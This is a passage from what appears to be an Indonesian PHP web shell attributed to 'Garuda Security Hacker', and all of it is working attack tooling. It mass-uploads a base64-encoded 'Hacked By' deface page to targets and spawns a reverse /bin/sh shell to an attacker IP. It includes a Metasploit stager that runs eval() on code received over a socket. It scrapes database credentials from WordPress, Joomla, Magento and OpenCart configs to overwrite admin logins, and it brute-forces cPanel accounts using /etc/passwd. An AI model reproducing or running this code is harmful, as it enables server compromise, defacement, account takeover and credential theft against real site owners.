2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9IjYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1828.         $decode_isi = base64_decode($isi_nama_doang);
  1829.         $encode = base64_encode($global);
  1830.         $ss = fopen($global,"w");
  1831.         fputs($ss, $decode_isi);
  1832.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  1833.         echo "Done index.php<br>";
  1834.         $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
  1835.         $post1 = array(
  1836.                 "target" => "l1_$encode",
  1837.                 "content" => "$decode_isi",);
  1838.         $post2 = array( "upload[]" => "@$global",);
  1839.         $output_mkfile = ngirim("$korban", $post1);
  1840.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  1841.             }
  1842.         }
  1843. ?>
  1844. <form method="post">
  1845. <input type="submit" name="s" value="lol.php">
  1846. </form>
  1847. <?php
  1848. $targets = explode("\r\n", $_POST['targets']);
  1849. if($_POST['s']) {
  1850.     foreach($targets as $korba) {
  1851.         $globa = "lol.php";
  1852.         $isi_nama = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9IjYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1853.         $decode_isi = base64_decode($isi_nama);
  1854.         $encode = base64_encode($globa);
  1855.         $ss = fopen($globa,"w");
  1856.         fputs($ss, $decode_isi);
  1857.         echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>";
  1858.         echo "Done lol.php<br>";
  1859.         $url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
  1860.         $post1 = array(
  1861.                 "targets" => "l1_$encode",
  1862.                 "content" => "$decode_isi",);
  1863.         $post2 = array( "upload[]" => "@$globa",);
  1864.         $output_mkfil = ngirim("$korban", $post1);
  1865.             $upload_as = ngirim("$korban?cmd=upload", $post2);
  1866.             }
  1867.         }
  1868.  
  1869. } elseif($_GET['do'] == 'tool') {
  1870. error_reporting(0);
  1871. function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
  1872. $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
  1873. echo $s_result;
  1874. if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
  1875. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  1876. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  1877. if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
  1878. if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
  1879. umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
  1880. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  1881. $process = proc_open($shell, $descriptorspec, $pipes);
  1882. if(!is_resource($process)) exit(1);
  1883. stream_set_blocking($pipes[0], 0);
  1884. stream_set_blocking($pipes[1], 0);
  1885. stream_set_blocking($pipes[2], 0);
  1886. stream_set_blocking($sock, 0);
  1887. while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  1888. if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
  1889. if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
  1890. if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
  1891. } elseif($_GET['do'] == 'auto_edit_user') {
  1892.     if($_POST['hajar']) {
  1893.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1894.             echo "username atau password harus lebih dari 6 karakter";
  1895.         } else {
  1896.             $user_baru = $_POST['user_baru'];
  1897.             $pass_baru = md5($_POST['pass_baru']);
  1898.             $conf = $_POST['config_dir'];
  1899.             $scan_conf = scandir($conf);
  1900.             foreach($scan_conf as $file_conf) {
  1901.                 if(!is_file("$conf/$file_conf")) continue;
  1902.                 $config = file_get_contents("$conf/$file_conf");
  1903.                 if(preg_match("/JConfig|joomla/",$config)) {
  1904.                     $dbhost = ambilkata($config,"host = '","'");
  1905.                     $dbuser = ambilkata($config,"user = '","'");
  1906.                     $dbpass = ambilkata($config,"password = '","'");
  1907.                     $dbname = ambilkata($config,"db = '","'");
  1908.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1909.                     $prefix = $dbprefix."users";
  1910.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1911.                     $db = mysql_select_db($dbname);
  1912.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1913.                     $result = mysql_fetch_array($q);
  1914.                     $id = $result['id'];
  1915.                     $site = ambilkata($config,"sitename = '","'");
  1916.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1917.                     echo "Config => ".$file_conf."<br>";
  1918.                     echo "CMS => Joomla<br>";
  1919.                     if($site == '') {
  1920.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1921.                     } else {
  1922.                         echo "Sitename => $site<br>";
  1923.                     }
  1924.                     if(!$update OR !$conn OR !$db) {
  1925.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1926.                     } else {
  1927.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1928.                     }
  1929.                     mysql_close($conn);
  1930.                 } elseif(preg_match("/WordPress/",$config)) {
  1931.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1932.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1933.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1934.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1935.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1936.                     $prefix = $dbprefix."users";
  1937.                     $option = $dbprefix."options";
  1938.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1939.                     $db = mysql_select_db($dbname);
  1940.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1941.                     $result = mysql_fetch_array($q);
  1942.                     $id = $result[ID];
  1943.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1944.                     $result2 = mysql_fetch_array($q2);
  1945.                     $target = $result2[option_value];
  1946.                     if($target == '') {
  1947.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1948.                     } else {
  1949.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1950.                     }
  1951.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1952.                     echo "Config => ".$file_conf."<br>";
  1953.                     echo "CMS => Wordpress<br>";
  1954.                     echo $url_target;
  1955.                     if(!$update OR !$conn OR !$db) {
  1956.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1957.                     } else {
  1958.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1959.                     }
  1960.                     mysql_close($conn);
  1961.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1962.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1963.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1964.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1965.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1966.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1967.                     $prefix = $dbprefix."admin_user";
  1968.                     $option = $dbprefix."core_config_data";
  1969.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1970.                     $db = mysql_select_db($dbname);
  1971.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1972.                     $result = mysql_fetch_array($q);
  1973.                     $id = $result[user_id];
  1974.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1975.                     $result2 = mysql_fetch_array($q2);
  1976.                     $target = $result2[value];
  1977.                     if($target == '') {
  1978.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1979.                     } else {
  1980.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1981.                     }
  1982.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1983.                     echo "Config => ".$file_conf."<br>";
  1984.                     echo "CMS => Magento<br>";
  1985.                     echo $url_target;
  1986.                     if(!$update OR !$conn OR !$db) {
  1987.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1988.                     } else {
  1989.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1990.                     }
  1991.                     mysql_close($conn);
  1992.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1993.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1994.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1995.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1996.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1997.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1998.                     $prefix = $dbprefix."user";
  1999.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2000.                     $db = mysql_select_db($dbname);
  2001.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2002.                     $result = mysql_fetch_array($q);
  2003.                     $id = $result[user_id];
  2004.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2005.                     if($target == '') {
  2006.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2007.                     } else {
  2008.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2009.                     }
  2010.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2011.                     echo "Config => ".$file_conf."<br>";
  2012.                     echo "CMS => OpenCart<br>";
  2013.                     echo $url_target;
  2014.                     if(!$update OR !$conn OR !$db) {
  2015.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2016.                     } else {
  2017.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2018.                     }
  2019.                     mysql_close($conn);
  2020.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2021.                     $dbhost = ambilkata($config,'server = "','"');
  2022.                     $dbuser = ambilkata($config,'username = "','"');
  2023.                     $dbpass = ambilkata($config,'password = "','"');
  2024.                     $dbname = ambilkata($config,'database = "','"');
  2025.                     $prefix = "users";
  2026.                     $option = "identitas";
  2027.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2028.                     $db = mysql_select_db($dbname);
  2029.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2030.                     $result = mysql_fetch_array($q);
  2031.                     $target = $result[alamat_website];
  2032.                     if($target == '') {
  2033.                         $target2 = $result[url];
  2034.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2035.                         if($target2 == '') {
  2036.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2037.                         } else {
  2038.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2039.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2040.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2041.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2042.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2043.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2044.                             } else {
  2045.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2046.                             }
  2047.                         }
  2048.                     } else {
  2049.                         $cek_login = file_get_contents("$target/adminweb/");
  2050.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2051.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2052.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2053.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2054.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2055.                         } else {
  2056.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2057.                         }
  2058.                     }
  2059.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2060.                     echo "Config => ".$file_conf."<br>";
  2061.                     echo "CMS => Lokomedia<br>";
  2062.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2063.                         echo $url_target2;
  2064.                     } else {
  2065.                         echo $url_target;
  2066.                     }
  2067.                     if(!$update OR !$conn OR !$db) {
  2068.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2069.                     } else {
  2070.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2071.                     }
  2072.                     mysql_close($conn);
  2073.                 }
  2074.             }
  2075.         }
  2076.     } else {
  2077.         echo "<center>
  2078.         <h1>Auto Edit User Config</h1>
  2079.         <form method='post'>
  2080.         DIR Config: <br>
  2081.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2082.         Set User & Pass: <br>
  2083.         <input type='text' name='user_baru' value='global' placeholder='user_baru'><br>
  2084.         <input type='text' name='pass_baru' value='global' placeholder='pass_baru'><br>
  2085.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2086.         </form>
  2087.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2088.         ";
  2089.     }
  2090. } elseif($_GET['do'] == 'cpanel') {
  2091.     if($_POST['crack']) {
  2092.         $usercp = explode("\r\n", $_POST['user_cp']);
  2093.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2094.         $i = 0;
  2095.         foreach($usercp as $ucp) {
  2096.             foreach($passcp as $pcp) {
  2097.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2098.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2099.                     } else {
  2100.                         $_SESSION[$ucp] = "1";
  2101.                         $_SESSION[$pcp] = "1";
  2102.                         if($ucp == '' || $pcp == '') {
  2103.                            
  2104.                         } else {
  2105.                             $i++;
  2106.                             if(function_exists('posix_getpwuid')) {
  2107.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  2108.                                 if($domain_cp == '') {
  2109.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  2110.                                 } else {
  2111.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2112.                                     foreach($domains_cp[1] as $dj) {
  2113.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2114.                                         $user_cp_url = $user_cp_url['name'];
  2115.                                         if($user_cp_url == $ucp) {
  2116.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  2117.                                             break;
  2118.                                         }
  2119.                                     }
  2120.                                 }
  2121.                             } else {
  2122.                                 $dom = "<font color=red>function is Disable by system</font>";
  2123.                             }
  2124.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  2125.                         }
  2126.                     }
  2127.                 }
  2128.             }
  2129.         }
  2130.         if($i == 0) {
  2131.         } else {
  2132.             echo "<br>sukses maling ".$i." Cpanel by <font color=lime>N4ST4R_ID.</font>";
  2133.         }
  2134.     } else {
  2135.         echo "<center>
  2136.         <form method='post'>
  2137.         USER: <br>
  2138.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2139.         $_usercp = fopen("/etc/passwd","r");
  2140.         while($getu = fgets($_usercp)) {
  2141.             if($getu == '' || !$_usercp) {
  2142.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2143.             } else {
  2144.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2145.                 foreach($u[1] as $user_cp) {
  2146.                         if(is_dir("/home/$user_cp/public_html")) {
  2147.                             echo "$user_cp\n";
  2148.                     }
  2149.                 }
  2150.             }
  2151.         }
  2152.         echo "</textarea><br>
  2153.         PASS: <br>
  2154.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2155.         function cp_pass($dir) {
  2156.             $pass = "";
  2157.             $dira = scandir($dir);
  2158.             foreach($dira as $dirb) {
  2159.                 if(!is_file("$dir/$dirb")) continue;
  2160.                 $ambil = file_get_contents("$dir/$dirb");
  2161.                 if(preg_match("/WordPress/", $ambil)) {
  2162.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2163.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2164.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2165.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2166.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2167.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2168.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2169.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2170.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
